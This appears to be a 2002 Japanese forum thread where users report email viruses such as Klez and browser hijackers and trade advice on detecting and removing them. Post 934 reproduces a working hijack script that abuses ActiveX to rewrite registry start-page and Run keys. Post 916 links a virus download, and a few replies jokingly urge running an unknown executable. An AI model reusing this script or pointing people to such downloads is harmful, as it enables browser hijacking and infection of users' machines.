あのここ数日、
「Have a funny Lady Day 」もしくは
「Happy Lady Day」というタイトルで送られてくるメールが
多数あるのですがこれはウイルスなのでしょうか?
Symantec等でウイルス情報の検索をかけたのですが何も出てきませんし。
ちなみにファイルサイズは大体、120kb前後です。



901 :名無しさん@お腹いっぱい。:02/03/20 22:05
うちも昨日から
「write Fixup」「Hello,Your Password」というのがきています。
サイズは同じく120k前後、1つだけテキスト表示で見てみましたが
中身は無く添付ファイルがhtmlとpif。

902 :名無しさん@お腹いっぱい。:02/03/20 22:10
>>900
http://vil.nai.com/vil/content/v_99367.htm

903 :cheshire-cat:02/03/20 22:39
去年、検出できないのをまとめて某社にプレゼントした。
今ごろレスが来た。
半分くらいはまあ、変なファイルにバインドして失敗した壊れた奴とか、解凍したら実行ファイルじゃなかったとか(ろくに確かめもせず送って、反省中)、って回答だった。

残りはさ、「最新の定義ファイルで検出できます」、だって。複雑な気持ち。
某社の定義ファイルの更新が先日重かったのは、漏れのせいです。

904 :900:02/03/20 22:42
>>902さん
どうもです。
ノートンは入れてあったので大丈夫だとは思いましたが、
定義ファイルを最新にしてチェックしてみたところ問題ありませんでした。
にしても感染している人が多そうですね。

905 :cheshire-cat:02/03/20 22:46
>>904
KLEZ.Eの感染者がやたらと多いのは、複数の変種がまとめて同じ検出名だという現実を反映しているためかと。

早くなんとかしてほしい。

906 :名無しさん@お腹いっぱい。:02/03/20 22:52
つーかチェシャ猫の人。
832のVirを欲しがったのは単にコレクションしたいだけなのかと思ってたら
ちゃんと調べたのね。お勤めご苦労様。

907 :900:02/03/20 23:03
>>905
変種が色々とあるんですね。
サイズやサブジェクトが異なるのはそのせいでしょうか。
にしても1日に4通は多いなぁ。

908 :cheshire-cat:02/03/20 23:04
>>906
本人にはメル送りました。
現在漏れが所有している3タイプのうちの一つでした。
「件名や送信者名が多様だから」、って思い込みのためなんでしょうか。
漏れVilliはVBSしか理解できない厨だから、人に何か教えるほどのスキル無いけど。

配布(と言っていいのか?)は、メル経由と他のファイルにバインドしてMX、この2つが主流。シルクロープでも使えば簡単だろうし。

なおKLEZ系は、NortonとTrendとAitidoteとMcAFEEは同様の情報だけど。
何か情報が交錯してるっしょ?
ちなみにSophosは、あと2つほど検出名多いです。

909 :cheshire-cat:02/03/20 23:10
>>907
HP立てると、イパーイ来るよ。

ちなみに漏れが今Virri情報集めまくってるのは、うちの鯖が喰らってあぼーんされた腹いせのようなものです。

910 :名無しさん@お腹いっぱい。:02/03/20 23:30
>>908
VBS読めるならOffice のマクロ系も読めるよ(メリッサとか)。

911 :832:02/03/20 23:50
どうもうちに来た物と同種の物が企業にも被害を与えているようです。
直接的な物ではありませんが、困ったウィルスですね。

http://www.bestrsv.com/info/virus-rep010.html


912 :cheshire-cat:02/03/20 23:51
>>910
VBSと似たようなものだからね。
ちなみにマクロ系流行る以前は、ほとんどウイルスに無関心だったよ、一太郎中心だったし。

罫線が楽だったな、一太郎。Wordはその点は使いづらくて。

913 :名無しさん@お腹いっぱい。:02/03/20 23:54
>>911
そのページ読んで疑問なのが
>全てに渡りパソコンを使用せず、UNIX上でのプログラム作成を行って
>おりますのでファイル(ウ イルス等)が添付される事はございませんの
>でご安心ください。
の部分なんだよな。UNIXにはウィルスが無いとでも思ってるのかしら。

914 :cheshire-cat:02/03/20 23:55
>>911
どうも。
送信者が知人だったりしたら、人間関係悪くなりそうですな。

915 :名無しさん@お腹いっぱい。:02/03/21 00:53
たいていのウィルスはメールを出すときに感染者のアドレスで出すが、
Klez はこれを詐称して無関係の他人を巻き込む。あまり知られていないので要注意。
社内をアンチウィルスソフトでガチガチに固めても、知りもしない第三者によって
会社の信用が落とされてしまうという悲劇が実際にいくつも起きている。

http://a500.g.akamai.net/7/1776/484/00003/inet.trendmicro.co.jp/solutionfile/3638KLEZ_E.html
>・E-Mail送信の際の差出人:
> 「WORM_KLEZ.E」では、感染コンピュータ内で取得した任意のメールアドレス、
>または以下のアドレスのいずれかを使用します。

> メール送信の際に使用する SMTP サーバは、メールの「差出人」に設定された
>メールアドレスのドメインを使用する場合があります。差出人のメールアドレスを
>「any_user@somewhere.com」として設定した場合、SMTP サーバ「smtp.somewhere.com」
>を利用します。

POP before SMTPや接続元IPアドレスでの制限をせず、Fromアドレスだけ一致していれば
送信を許可してしまうような甘い設定のメールサーバはKlezの踏台になる可能性がある。

916 :名無しさん@お腹いっぱい。:02/03/21 01:11
http://www.ebcvg.com/binary2.php

Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...

win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...

written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。

917 :名無しさん@お腹いっぱい。:02/03/21 20:26
age

918 :名無しさん@お腹いっぱい。:02/03/21 22:40
Subject: なし
FROM: なし
BODY: なし
ATTACHMENT: BOBNBFBO.EXE
3月11日着
二フ経由

グルグルしてもシマンテック・トレンドマイクロ
検索したけど引っかからない〜
(あんちびる 入れてないオイラも悪いけど…)

実行したくてしたくてうずうずする〜


919 :名無しさん@お腹いっぱい。:02/03/21 22:43
実行していいよ、たいしたことないし

920 :名無しさん@お腹いっぱい。:02/03/21 22:44
実行しる

921 :名無しさん@お腹いっぱい。:02/03/21 22:44
さんくす〜

922 :ドキンちゃん:02/03/21 22:50
>918
http://www.ipa.go.jp/security/topics/hybris.html


923 :名無しさん@お腹いっぱい。:02/03/21 23:11
>>918
ものすごくわかりやすいファイル名(w

924 :ナマでパコパコ!!!!:02/03/21 23:16
>>918
ナマでパコパコ!!!!
インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?


925 :うーん・・・:02/03/21 23:53
W32/Fbound.c@MMのファイルを実行した友人(WIN95)から
アドレス帳が消えてしまったと…
復活の方法ってあるんでしょうか?


926 :テイル:02/03/22 00:17
http://ime.nu/www.google.co.jp&page=@go5.163.com/sg9741/index.html?yuryo
を実行してしまったんですけど直す方法はないでしょうか?;;

927 :ちんこ ◆SGML.ENE :02/03/22 00:30
>>926

  +
+        +                    
  (`Д´)ノ    イエイッ
  く(  ) +
  / ヽ      


928 :名無しさん@お腹いっぱい。:02/03/22 00:41
>>926
ページのHTMLソースを読んで、この逆をやればイイ。

929 :テイル:02/03/22 02:06
>>928さん   逆・・・・・?

930 :名無しさん@お腹いっぱい。:02/03/22 02:20
対応方法:
 一個のスクリプトのため「駆除」できません。検知した場合は、ファイルを「削除」してください。

 「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場合、「駆除失敗」となることがあります。その際は、検知したファイルを「削除」していただければ、問題ありません。

 スクリプトが実行された場合、Internet Explorer のスタートページなどが変更されているおそれがあります。その場合は、[ツール]−[インターネットオプション]から、設定を変更してください。

 また Microsoft 社提供の最新 Internet Explorer 修正モジュールを適用するようにしてください。


931 : :02/03/22 09:53
↑無断引用

932 :名無しさん@お腹いっぱい。:02/03/22 16:16
出典はどこ?

933 :名無しさん@お腹いっぱい:02/03/22 18:48
>>932
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

さすがに無断引用とは言わないだろうけど。
コピペするんだったらリンク貼って「〜より引用」くらい書き添えましょ。>>930
ネチケッツだと思われ。

934 : :02/03/22 19:17
>>926
>>926
<!--IPT language=JavaScript <!--
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent
</APPLET ");function yuzi(){try{a1=document.applets[0];a1.setCLSID
("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl =
a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://go5.163.com/sg9741/");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://go5.163.com/sg9741/");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " ィt。トr
http://go5.163.com/sg9741/ィq。トsQQセ翅ヨイソ シクヘクQQヲコナテ箙ムヒヘ~!!」。");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " ィt。トr
http://go5.163.com/sg9741/ィq。トsQQセ翅ヨイソ QQヲコナテ箙ムヒヘ,シクヘクナカ.ヌ・シメセ。ソ・スアセユセ~!!」。");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","
http://go5.163.com/sg9741/");}catch(e){}}catch(e){}}setTimeout("yuzi()",1000);
// -- </SCRI-->

935 : :02/03/22 20:14
>>934
で、>>926に自分でやれと??
言葉数の少ない人ですな。…ま、それもいいだろうけど。
ていうかソース見てもわかんなかったから、質問してきたんだと思うけどなぁ。

>>926
ファイル名指定→"msconfig"→win.iniタブ以下の、windowsの"run= "の右側を削除して空欄に。
ついでだから"load= "も見れ。(通常、= の右側は空欄)
それから、インターネットオプションのホームページを元どおりに書き直す。
仕上げにTemporary Internet File削除→再起動



936 :そろそろ・・・:02/03/22 20:14
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )


937 :対策:02/03/22 20:18
>>935
麻衣糞のぢゃばを3805にすればそのスクリプト動かない?

938 : :02/03/22 20:40
>>937
実際、踏んでないからワカんない。
でも最新パッチ充てて、ActiveXとJAVA切って、javaスクも切ってたら大概防げるんじゃない?
ていうか逆にこっちが訊きたいくらい。
自分には人柱になる度胸なんてないし。

そう言えば、セキュ板には喜んで人柱になる有名な人がいるな(w
誰とは言わないけど。


939 : :02/03/22 20:42
( ゚Д゚)<939!!!

940 :cheshire-cat:02/03/22 20:45
>>937
JAVA VMが3802以上なら大丈夫、と言われてるよ。

941 :938:02/03/22 21:02
実際に入れてる??↓
http://www.zdnet.co.jp/download/pc/tools/msjavavm_u.html

って訊こうとおもったらレスが…

>>940
>JAVA VMが3802以上なら大丈夫
と、言われても自分はちょっと→(((((;゚Д゚)))))ガクガクブルブルな状態です。
なもんでやっぱ遠慮しときます。切っててもとくに困んないし…

情報サンクス子>>cheshire-cat


942 :cheshire-cat:02/03/22 21:11
>>941
でもエクセプション系だけじゃないし、危険なのは。
938の人の書いた通りに、日頃から設定はきつめにした方がいいかと。

クスコってどこで売ってるんだ?

943 :名無しさん@お腹いっぱい。:02/03/23 00:45
950 取った人が次スレを立てるって事でよろしく。
975 迄に立つ気配無かったらチェシャ猫さんにお願いという事で。

944 :そろそろ・・・:02/03/23 00:57
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )


945 :cheshire-cat:02/03/23 09:52
>>943
推薦してもらってありがたいんだけど。
漏れスレッド立てられないんだよね、何故だろ。

946 :1 ◆tHfDbgsU :02/03/23 14:23
新スレ立てるから少し待ってください

947 :名無しさん@お腹いっぱい。:02/03/23 15:16
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/l50

新スレ立ちました


(立った直後にPCがフリーズしたときは「氏ねMS!」と本気で思いました)

948 : :02/03/23 15:20
立てる必要があったのかと思われ
質問スレ他に2つもあるのに

949 :cheshire-cat:02/03/23 15:57
>>948
リンクは便利だよ。

トレンドが鯖不調で繋がらなかったり、メール送れない。
そのせいか、定義ファイルから漏れているのが多いような気が。

Symantecは、「送る必要がないですよん」、なんて表示がでて腹立つし。
アルカリスなどは検出できない(対応しているはずなのに)。

現在メーカー製で信頼できるのは、漏れ的にはAntidote。
LZHはダメだけど。検出力には不満は無い。

Sophos早く買ってテストしようっと(楽しみ

950 :名無しさん@お腹いっぱい。:02/03/24 01:16
えーと、新スレ出来た以上ここはあってはならない場所なので
sage で埋め立てたいと思います。
協力してください。

951 :名無しさん@お腹いっぱい。:02/03/24 01:16


952 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/25 07:14
http://pc.2ch.net/test/read.cgi/sec/1016863569/l50

953 :名無しさん@お腹いっぱい。:02/03/26 10:03
☆ウィルス情報&質問 総合スレッド☆part2 http://pc.2ch.net/test/read.cgi/sec/1016863569/l50

954 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/26 10:54
ttp://pc.2ch.net/test/read.cgi/sec/1016863569/l50

955 :埋め立て屋:02/03/26 11:09
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5

956 :名無しさん@埋め立て中…:02/03/26 15:16
☆ウィルス情報&質問 総合スレッド☆part2

957 :名無しさん@埋め立て中…:02/03/26 15:18
ttp://pc.2ch.net/test/read.cgi/sec/1016863569/

958 :名無しさん@お腹いっぱい。:02/03/26 17:02
☆ウィルス情報&質問 総合スレッド☆part2

959 : :02/03/27 07:11
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-6/

960 :埋め立て屋:02/03/29 16:59


961 :埋め立て屋:02/03/29 16:59


962 :埋め立て屋:02/03/29 16:59


963 :埋め立て屋:02/03/29 16:59


964 :埋め立て屋:02/03/29 16:59


965 :埋め立て屋:02/03/29 16:59


966 :埋め立て屋:02/03/29 17:00


967 :埋め立て屋:02/03/29 17:00


968 :埋め立て屋:02/03/29 17:00


969 :埋め立て屋:02/03/29 17:01
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5

970 :速いな:02/03/29 18:08
age

971 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/30 09:07
☆ウィルス情報&質問 総合スレッド☆part2

972 :化け猫:02/03/30 12:53
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/

973 :化け猫:02/03/30 14:00
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/


974 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/30 19:53
ttp://pc.2ch.net/test/read.cgi/sec/1016863569/1-5/

975 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/31 02:07
ttp://pc.2ch.net/test/read.cgi/sec/1016863569/1-5/

976 :☆ウィルス情報&質問 総合スレッド☆part2:02/03/31 13:36
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5

977 :化け猫:02/03/31 15:26
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/

978 :化け猫:02/03/31 15:26
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/



979 :化け猫:02/03/31 15:26
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/


980 :化け猫:02/03/31 15:27
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/





981 :埋め立て屋:02/03/31 22:22


982 :埋め立て屋:02/03/31 22:22


983 :埋め立て屋:02/03/31 22:22


984 :埋め立て屋:02/03/31 22:22


985 :埋め立て屋:02/03/31 22:22


986 :埋め立て屋:02/03/31 22:23


987 :埋め立て屋:02/03/31 22:23


988 :埋め立て屋:02/03/31 22:23
    

989 :埋め立て屋:02/03/31 22:23


990 :埋め立て屋:02/03/31 22:24
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5

991 :埋め立て屋:02/03/31 22:24


992 :埋め立て屋:02/03/31 22:24


993 :埋め立て屋:02/03/31 22:24


994 :埋め立て屋:02/03/31 22:24
   

995 :埋め立て屋:02/03/31 22:24
  

996 :埋め立て屋:02/03/31 22:24


997 :埋め立て屋:02/03/31 22:24


998 :埋め立て屋:02/03/31 22:24
     

999 :埋め立て屋:02/03/31 22:25
999ゲト

1000 :埋め立て屋:02/03/31 22:25
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/test/read.cgi/sec/1016863569/1-5

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

273 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)